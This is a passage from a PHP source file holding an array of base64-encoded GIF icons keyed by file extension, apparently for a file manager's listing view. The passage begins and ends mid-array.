+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_bat"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_bin"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". 
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_bmp"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_cat"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cnf"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK". +"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq". +"Yh4vWOz6ikZFoynjSi6byQkAOw==", +"ext_com"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". 
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cov"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i". +"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=", +"ext_cpc"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_cpl"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_crl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_crt"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_css"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_dot"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///8DAwAAA/4CAgICAAP//AAAAAANW". +"eHrV/gWsYqq9cQDNN3gCAARkSQ5m2K2A4AahF2wBJ8AwjWpz6N6x2ar2y+1am9uoFNQtB0WVybQk". +"xVi2V0hBmHq3B8JvPCZIuAKxOp02L8KEuFwuSQAAOw==", +"ext_dsp"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///wAAgICAgAAAAAAAAAAAAAAAAAND". +"SATc7gqISesE0WrxWPgg6InAYH6nxz3hNwKhdwYqvDqkq5MDbf+BiQ/22sWGtSCFRlMsjCRMpKEU". +"Sp1OWOuKXXSkCQA7", +"ext_dsw"=> +"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgQAAAP///wAAgAAAAAIrnI+py+0CYxwgyUvr". 
+"AaH7AIThBnJhKWrc16UaVcbVSLIglbipw/f+D0wUAAA7", +"ext_eml"=> +"R0lGODlhEAAQAGYAACH5BAEAAEoALAAAAAAQABAAhgAAAHBwcP7//3l+qc3MzP3+/+ny/ZGexQ+L". +"/1qh9C1kvVBQg////zVe+NaSdubx9zSq/wWV/4TF/xiV9oWp3EBu6Fy4/w2c/nGKtqvZ8QKX/05j". +"kkZzxSyo//Dx8vz8/G17qfz9/q7h/wmQ/+31+lZzqnyWw1p5sRxJlkJsr+fy+D+X7wt76ou26ROD". +"7AyN//P5/1yb5/r8/tHm8tvr9NPV11GN2E1VbzhVvDFW7WSG04NNL3yOwi5Q5BOg/2JjlgOV+/r6". +"+mhuoWO6/0ZloBtNroag1qrd/7rt/yZ0/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAe1gEqCg0oJCSWEiYMJSCI2KIpKCIIJRy0KOBxEhBQUCBQJEisKB6Wl". +"A4JGAggWHRMKH0EfIQUGAwFKJgwICA1FJAW0Dg4wt0oYDA0VPRw8Bc87Dra4yAweBNjYNTQz00og". +"MgLiAgXKORUN3kIFAtfZEx0aQN4/4+IZFxcWEhHeGw8AVWSYEAGCBAv9jC1YEMOFDggvfAwBsUDD". +"QlxKAgRQwCLJCAgbNJ7QiHHQxhQ3SkYSRHJlIAA7", +"ext_exc"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAgv///4CAgAAAAMDAwAAAAAAAAAAAAAAAAAM6". +"SBTcrnCBScEYIco7aMdRUHkTqIhcBzjZOb7tlnJTLL6Vbc3qCt242m/HE7qCRtmMokP6jkgba5pJ". +"AAA7", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_fla"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_fon"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAICAgMDAwAAA/wAAAAAAAAAAAANJ". +"WLLc9VCASecQ8MlKB8ARRwVkEDabZWrf5XarYglEXQNDnNID0Q+50ETywwVZnwXApxJWmDgdx9ZE". +"VoCeo0wEi2C/31hpTF4lAAA7", +"ext_gif"=> +"R0lGODlhEAAQAGYAACH5BAEAAEYALAAAAAAQABAAhgAAAGZmZoWm2dfr/sjj/vn7/bfZ/bnK+Ofy". 
+"/cXX/Jam05GYyf7LAKnT/QNoAnCq0k5wUJWd0HSDthZ2E0Om94my52N3xpXF+d3k6/7nkebs8zuh". +"J9PY6HmHyXuSxXmb2YUeCnq68m10p3Z6w3GsUEisMWuJVlZswUGV5H1uo2W0knK1qZSkyqG644WZ". +"yYWIs4uTtaux+MfL/uXn5/7tsZvD6q7F28pjIIp4hMhsFIglCqxWKLOLdP/VM/7bU9WNTeeCKOey". +"LnZZhjhwR1x5Zx1oLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAevgAKCg4MBRoeIAhkFjI0CIYaIRgIMPjSNBRQUKJGHAj0MDEEFCAgJ". +"CTELnYoMOUA/GggDAzIHqwU8OzcgQrMDCbaJBQY4OikjFgQEwKulBBUKEScWp8GesbIGHxE1RTbW". +"Ri4zsrPPKxsO4B4YvsoGFyroQ4gd7APKBAbvDyUTEIcSONxzp6/BgQck/BkJiE+fgQYGWwQwQcSI". +"CAUYFbBYwHEBjBcBQh4KSbIkSUSBAAA7", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_ht"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwP8AAP///wAA/wAAgAD//wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARMEEk0pr2VynxnHQEYjGM3nESqCsB2fkAss9gJHEVu0B4S". +"EICcjqfxAYWFXevyAxieT+IkIKhaq0sLaUtiqr6qrPFKFgdkaHRnzW5PIgA7", +"ext_hta"=> +"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgf///wAAAACAAAAAAAI63IKpxgcPH2ouwgBC". +"w1HIxHCQ4F3hSJKmwZXqWrmWxj7lKJ2dndcon9EBUq+gz3brVXAR2tICU0gXBQA7", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_htm"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_img"=> +"R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV". +"Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp". +"qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq". +"BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==", +"ext_inf"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_isp"=> +"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAAP8A/wCAgAD/////AP///8DAwICA". +"gIAAgACAAAD/AAAAAAAAAAAAAAAAAARakMl5xjghzC0HEcIAFBrHeALxiSQ3LIJhEIkwltOQxiEC". +"YC6EKpUQBQCc1Oej8B05R4XqYMsgN4ECwGJ8mrJHgNU0yViv5DI6LTGvv1lSmBwwyM1eDmDP328i". +"ADs=", +"ext_ist"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAzmQBmzAAAAABmmQCZzACZ/wAzzGaZzDOZ". +"/5n//wBm/2bM/zPM/zOZzMz//zNmzJnM/zNmmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV1oASMZDlKqDisQRscQYIAKRAFw3scTSPPKMDh4cI9dqRgi0BY4gINoIhQ". +"QBQUhSZOSBMxIIkEo5BlrrqAhWO9KLgIg5NokYCMiwGDHICwKt5NemhkeEV7ZE1MLQYtcUF/RQaS". +"AGdKLox5I5Uil5iUZ2gmoichADs=", +"ext_jfif"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_jpe"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_jpeg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_m1v"=> +"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A". +"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW". +"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ". +"BHx9IBOAg4SIDBEAOw==", +"ext_m3u"=> +"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4". +"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh". +"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ". +"PXeKNQMPPml9NVaMBDUVIQA7", +"ext_mdb"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM". +"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7", +"ext_mid"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE". +"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ". +"TBeDrHZ7NXm/pwQAOw==", +"ext_midi"=> +"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE". +"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ". +"TBeDrHZ7NXm/pwQAOw==", +"ext_mov"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm". +"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=", +"ext_mp3"=> +"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP". 
